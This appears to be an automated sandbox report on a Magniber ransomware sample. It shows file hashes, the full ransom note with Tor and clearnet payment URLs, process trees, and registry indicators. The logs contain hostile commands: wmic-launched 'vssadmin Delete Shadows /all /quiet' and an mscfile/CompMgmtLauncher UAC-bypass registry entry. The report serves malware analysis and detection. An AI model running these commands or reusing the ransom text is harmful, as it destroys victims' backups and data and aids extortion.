magniber | 4889479cc52b989f745d78a483c62fabaa70e7f078a82a5656c8a454e599bac5

Analysis

max time kernel
132s
max time network
122s
platform
windows7_x64
resource
win7-en-20211014
submitted
09/11/2021, 06:19

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

xnfipyy.inf.dll
Size

38KB
MD5

18ff6706dac4cda1c85afa02495f4149
SHA1

a9b70524165713bcb147ca22c95475c091232904
SHA256

4889479cc52b989f745d78a483c62fabaa70e7f078a82a5656c8a454e599bac5
SHA512

d3c2ae6497eeaa323544e72a39d3dfe95a5701054944cf09307cfc2b6e70011ea93035e1523739af3a8b39022b7fe3ca7ebc95493731b4184132f2ae783582d9

Score

10^/10

magniber ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://2c683a18a83022505adujyxylz.w3disbrllt7cfknxuutwevchixw5vbyc4ujvg5cz3u57nryezwqgwnad.onion/dujyxylz Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://2c683a18a83022505adujyxylz.wonsre.space/dujyxylz http://2c683a18a83022505adujyxylz.wheelgo.sbs/dujyxylz http://2c683a18a83022505adujyxylz.fitsbus.uno/dujyxylz http://2c683a18a83022505adujyxylz.amlack.quest/dujyxylz Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://2c683a18a83022505adujyxylz.w3disbrllt7cfknxuutwevchixw5vbyc4ujvg5cz3u57nryezwqgwnad.onion/dujyxylz

http://2c683a18a83022505adujyxylz.wonsre.space/dujyxylz

http://2c683a18a83022505adujyxylz.wheelgo.sbs/dujyxylz

http://2c683a18a83022505adujyxylz.fitsbus.uno/dujyxylz

http://2c683a18a83022505adujyxylz.amlack.quest/dujyxylz

Signatures

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber

Process spawned unexpected child process 12 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1192	1956	cmd.exe	38
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1808	1956	vssadmin.exe	38
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	588	1956	vssadmin.exe	38
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2336	1956	vssadmin.exe	38
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2356	1956	cmd.exe	38
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2504	1956	vssadmin.exe	38
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2688	1956	cmd.exe	38
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2716	1956	vssadmin.exe	38
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2856	1956	vssadmin.exe	38
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3020	1956	cmd.exe	38
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3040	1956	vssadmin.exe	38
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	204	1956	vssadmin.exe	38

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies extensions of user files 8 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File renamed	C:\Users\Admin\Pictures\WaitSkip.tif => C:\Users\Admin\Pictures\WaitSkip.tif.dujyxylz	taskhost.exe
File renamed	C:\Users\Admin\Pictures\InvokeDismount.crw => C:\Users\Admin\Pictures\InvokeDismount.crw.dujyxylz	taskhost.exe
File renamed	C:\Users\Admin\Pictures\SendSkip.crw => C:\Users\Admin\Pictures\SendSkip.crw.dujyxylz	taskhost.exe
File opened for modification	C:\Users\Admin\Pictures\CheckpointClear.tiff	taskhost.exe
File renamed	C:\Users\Admin\Pictures\CheckpointClear.tiff => C:\Users\Admin\Pictures\CheckpointClear.tiff.dujyxylz	taskhost.exe
File opened for modification	C:\Users\Admin\Pictures\PingMount.tiff	taskhost.exe
File renamed	C:\Users\Admin\Pictures\PingMount.tiff => C:\Users\Admin\Pictures\PingMount.tiff.dujyxylz	taskhost.exe
File renamed	C:\Users\Admin\Pictures\SendInstall.png => C:\Users\Admin\Pictures\SendInstall.png.dujyxylz	taskhost.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 1088 set thread context of 1224	1088	rundll32.exe	15
PID 1088 set thread context of 1336	1088	rundll32.exe	14
PID 1088 set thread context of 1384	1088	rundll32.exe	13

Interacts with shadow copies 2 TTPs 8 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
3040	vssadmin.exe
204	vssadmin.exe
1808	vssadmin.exe
588	vssadmin.exe
2336	vssadmin.exe
2504	vssadmin.exe
2716	vssadmin.exe
2856	vssadmin.exe

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{FBFF0C21-412D-11EC-8589-7AE8C0FDC340} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000005bf5749d3a275447873d564a46cb1936000000000200000000001066000000010000200000004978e9e72509274231267268de35f3589a1f9897dac08618278e4374f0159f06000000000e8000000002000020000000a937f790949231cd10b96c0036d16a7df7c284ced3227ae608e2109f4a3665b020000000c1c3ac528afe0bb1facc97905999989c1c1aae62065d480c35eb1e683e0b1cdd4000000023eeecc06bf7dd2a05b7e9861c2b3ecdec3e13993959f3b236d79f17ad58f801d5502ade9a42096b979908e5d0324bdf133b3ae43337794584262a7026e227be	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 202e01d63ad5d701	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000005bf5749d3a275447873d564a46cb193600000000020000000000106600000001000020000000fce1f8aa1072407bbf432d7379280b1e152ee5d07bf7d4f5638b5d5c28ba8b0d000000000e8000000002000020000000f28263948518af1ff3a59ad7b7b03124b48b600d039166103d88d90a067d263390000000ab5ebb3a1b4f474a23a96a5d6b5dd61da59c82f60989cd92d0eae6fd63420fbcf678171771d0429346711790af5c23e1689aec3f0147cd72f5d80fca133fa6b6c2c139223ad955278cba4608ca52eb3af2055848363627399af5079aab593b3761c9908aaf5f0e065d9dcd0253ada0a66866f225786d4cc9e064d3117fc367a895b4cad164406bd37886b86c2bff629c40000000451c7f290ba3a9b96fbcddc1ed1ccd8400290bfa3f68ca0e5c97764e9ca0a0620ea3f9a299160845709c417e5604aa8a69093f31ce1635274b6c1e2ce45654bb	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe

Modifies registry class 11 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\mscfile	taskhost.exe
Key created	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\mscfile\shell\open	taskhost.exe
Key created	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\mscfile\shell\open\command	Dwm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Dwm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\mscfile\shell\open\command	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\mscfile\shell\open\command	taskhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	taskhost.exe
Key created	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\mscfile\shell\open\command	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\mscfile\shell	taskhost.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
748	notepad.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1088	rundll32.exe
1088	rundll32.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1384	Explorer.EXE

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
1088	rundll32.exe
1088	rundll32.exe
1088	rundll32.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	1976	wmic.exe
Token: SeSecurityPrivilege	1976	wmic.exe
Token: SeTakeOwnershipPrivilege	1976	wmic.exe
Token: SeLoadDriverPrivilege	1976	wmic.exe
Token: SeSystemProfilePrivilege	1976	wmic.exe
Token: SeSystemtimePrivilege	1976	wmic.exe
Token: SeProfSingleProcessPrivilege	1976	wmic.exe
Token: SeIncBasePriorityPrivilege	1976	wmic.exe
Token: SeCreatePagefilePrivilege	1976	wmic.exe
Token: SeBackupPrivilege	1976	wmic.exe
Token: SeRestorePrivilege	1976	wmic.exe
Token: SeShutdownPrivilege	1976	wmic.exe
Token: SeDebugPrivilege	1976	wmic.exe
Token: SeSystemEnvironmentPrivilege	1976	wmic.exe
Token: SeRemoteShutdownPrivilege	1976	wmic.exe
Token: SeUndockPrivilege	1976	wmic.exe
Token: SeManageVolumePrivilege	1976	wmic.exe
Token: 33	1976	wmic.exe
Token: 34	1976	wmic.exe
Token: 35	1976	wmic.exe
Token: SeIncreaseQuotaPrivilege	1748	WMIC.exe
Token: SeSecurityPrivilege	1748	WMIC.exe
Token: SeTakeOwnershipPrivilege	1748	WMIC.exe
Token: SeLoadDriverPrivilege	1748	WMIC.exe
Token: SeSystemProfilePrivilege	1748	WMIC.exe
Token: SeSystemtimePrivilege	1748	WMIC.exe
Token: SeProfSingleProcessPrivilege	1748	WMIC.exe
Token: SeIncBasePriorityPrivilege	1748	WMIC.exe
Token: SeCreatePagefilePrivilege	1748	WMIC.exe
Token: SeBackupPrivilege	1748	WMIC.exe
Token: SeRestorePrivilege	1748	WMIC.exe
Token: SeShutdownPrivilege	1748	WMIC.exe
Token: SeDebugPrivilege	1748	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1748	WMIC.exe
Token: SeRemoteShutdownPrivilege	1748	WMIC.exe
Token: SeUndockPrivilege	1748	WMIC.exe
Token: SeManageVolumePrivilege	1748	WMIC.exe
Token: 33	1748	WMIC.exe
Token: 34	1748	WMIC.exe
Token: 35	1748	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1976	wmic.exe
Token: SeSecurityPrivilege	1976	wmic.exe
Token: SeTakeOwnershipPrivilege	1976	wmic.exe
Token: SeLoadDriverPrivilege	1976	wmic.exe
Token: SeSystemProfilePrivilege	1976	wmic.exe
Token: SeSystemtimePrivilege	1976	wmic.exe
Token: SeProfSingleProcessPrivilege	1976	wmic.exe
Token: SeIncBasePriorityPrivilege	1976	wmic.exe
Token: SeCreatePagefilePrivilege	1976	wmic.exe
Token: SeBackupPrivilege	1976	wmic.exe
Token: SeRestorePrivilege	1976	wmic.exe
Token: SeShutdownPrivilege	1976	wmic.exe
Token: SeDebugPrivilege	1976	wmic.exe
Token: SeSystemEnvironmentPrivilege	1976	wmic.exe
Token: SeRemoteShutdownPrivilege	1976	wmic.exe
Token: SeUndockPrivilege	1976	wmic.exe
Token: SeManageVolumePrivilege	1976	wmic.exe
Token: 33	1976	wmic.exe
Token: 34	1976	wmic.exe
Token: 35	1976	wmic.exe
Token: SeShutdownPrivilege	1384	Explorer.EXE
Token: SeShutdownPrivilege	1384	Explorer.EXE
Token: SeShutdownPrivilege	1384	Explorer.EXE
Token: SeShutdownPrivilege	1384	Explorer.EXE

Suspicious use of FindShellTrayWindow 5 IoCs

pid	Process
1384	Explorer.EXE
1384	Explorer.EXE
1600	iexplore.exe
1384	Explorer.EXE
1384	Explorer.EXE

Suspicious use of SendNotifyMessage 2 IoCs

pid	Process
1384	Explorer.EXE
1384	Explorer.EXE

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
1600	iexplore.exe
1600	iexplore.exe
1968	IEXPLORE.EXE
1968	IEXPLORE.EXE
1968	IEXPLORE.EXE
1968	IEXPLORE.EXE

Suspicious use of UnmapMainImage 2 IoCs

pid	Process
1384	Explorer.EXE
1384	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1224 wrote to memory of 748	1224	taskhost.exe	28
PID 1224 wrote to memory of 748	1224	taskhost.exe	28
PID 1224 wrote to memory of 748	1224	taskhost.exe	28
PID 1224 wrote to memory of 792	1224	taskhost.exe	29
PID 1224 wrote to memory of 792	1224	taskhost.exe	29
PID 1224 wrote to memory of 792	1224	taskhost.exe	29
PID 1224 wrote to memory of 1976	1224	taskhost.exe	30
PID 1224 wrote to memory of 1976	1224	taskhost.exe	30
PID 1224 wrote to memory of 1976	1224	taskhost.exe	30
PID 1224 wrote to memory of 1520	1224	taskhost.exe	31
PID 1224 wrote to memory of 1520	1224	taskhost.exe	31
PID 1224 wrote to memory of 1520	1224	taskhost.exe	31
PID 1520 wrote to memory of 1748	1520	cmd.exe	35
PID 1520 wrote to memory of 1748	1520	cmd.exe	35
PID 1520 wrote to memory of 1748	1520	cmd.exe	35
PID 792 wrote to memory of 1600	792	vssvc.exe	36
PID 792 wrote to memory of 1600	792	vssvc.exe	36
PID 792 wrote to memory of 1600	792	vssvc.exe	36
PID 1192 wrote to memory of 968	1192	cmd.exe	43
PID 1192 wrote to memory of 968	1192	cmd.exe	43
PID 1192 wrote to memory of 968	1192	cmd.exe	43
PID 1600 wrote to memory of 1968	1600	iexplore.exe	47
PID 1600 wrote to memory of 1968	1600	iexplore.exe	47
PID 1600 wrote to memory of 1968	1600	iexplore.exe	47
PID 1600 wrote to memory of 1968	1600	iexplore.exe	47
PID 968 wrote to memory of 1628	968	CompMgmtLauncher.exe	48
PID 968 wrote to memory of 1628	968	CompMgmtLauncher.exe	48
PID 968 wrote to memory of 1628	968	CompMgmtLauncher.exe	48
PID 1336 wrote to memory of 2224	1336	Dwm.exe	53
PID 1336 wrote to memory of 2224	1336	Dwm.exe	53
PID 1336 wrote to memory of 2224	1336	Dwm.exe	53
PID 1336 wrote to memory of 2236	1336	Dwm.exe	55
PID 1336 wrote to memory of 2236	1336	Dwm.exe	55
PID 1336 wrote to memory of 2236	1336	Dwm.exe	55
PID 2236 wrote to memory of 2300	2236	cmd.exe	57
PID 2236 wrote to memory of 2300	2236	cmd.exe	57
PID 2236 wrote to memory of 2300	2236	cmd.exe	57
PID 2356 wrote to memory of 2400	2356	cmd.exe	62
PID 2356 wrote to memory of 2400	2356	cmd.exe	62
PID 2356 wrote to memory of 2400	2356	cmd.exe	62
PID 2400 wrote to memory of 2452	2400	CompMgmtLauncher.exe	63
PID 2400 wrote to memory of 2452	2400	CompMgmtLauncher.exe	63
PID 2400 wrote to memory of 2452	2400	CompMgmtLauncher.exe	63
PID 1384 wrote to memory of 2576	1384	Explorer.EXE	67
PID 1384 wrote to memory of 2576	1384	Explorer.EXE	67
PID 1384 wrote to memory of 2576	1384	Explorer.EXE	67
PID 1384 wrote to memory of 2588	1384	Explorer.EXE	68
PID 1384 wrote to memory of 2588	1384	Explorer.EXE	68
PID 1384 wrote to memory of 2588	1384	Explorer.EXE	68
PID 2588 wrote to memory of 2632	2588	cmd.exe	71
PID 2588 wrote to memory of 2632	2588	cmd.exe	71
PID 2588 wrote to memory of 2632	2588	cmd.exe	71
PID 2688 wrote to memory of 2732	2688	cmd.exe	76
PID 2688 wrote to memory of 2732	2688	cmd.exe	76
PID 2688 wrote to memory of 2732	2688	cmd.exe	76
PID 2732 wrote to memory of 2804	2732	CompMgmtLauncher.exe	77
PID 2732 wrote to memory of 2804	2732	CompMgmtLauncher.exe	77
PID 2732 wrote to memory of 2804	2732	CompMgmtLauncher.exe	77
PID 1088 wrote to memory of 2904	1088	rundll32.exe	81
PID 1088 wrote to memory of 2904	1088	rundll32.exe	81
PID 1088 wrote to memory of 2904	1088	rundll32.exe	81
PID 1088 wrote to memory of 2916	1088	rundll32.exe	82
PID 1088 wrote to memory of 2916	1088	rundll32.exe	82
PID 1088 wrote to memory of 2916	1088	rundll32.exe	82

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:1384
- C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Users\Admin\AppData\Local\Temp\xnfipyy.inf.dll,#1
  2⤵
  - Suspicious use of SetThreadContext
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:1088
- - C:\Windows\system32\wbem\wmic.exe
    C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:2904
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
    3⤵
    PID:2916
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
      4⤵
      PID:2972
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:2576
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2588
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    PID:2632

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1336
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:2224
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2236
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    PID:2300

C:\Windows\system32\taskhost.exe
"taskhost.exe"
1⤵
- Modifies extensions of user files
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1224
- C:\Windows\system32\notepad.exe
  notepad.exe C:\Users\Public\readme.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:748
- C:\Windows\system32\cmd.exe
  cmd /c "start http://2c683a18a83022505adujyxylz.wonsre.space/dujyxylz^&1^&35470377^&86^&373^&12"
  2⤵
  PID:792
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://2c683a18a83022505adujyxylz.wonsre.space/dujyxylz&1&35470377&86&373&12
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1600
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1600 CREDAT:275457 /prefetch:2
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:1968
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1976
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1520
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1748

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1192
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:968
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:1628

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1808

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:792

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:588

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2336

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2356
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2400
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:2452

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2504

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2688
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2732
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:2804

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2716

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2856

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
PID:3020
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  PID:1188
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:1304

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3040

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:204

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File Deletion

T1107

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

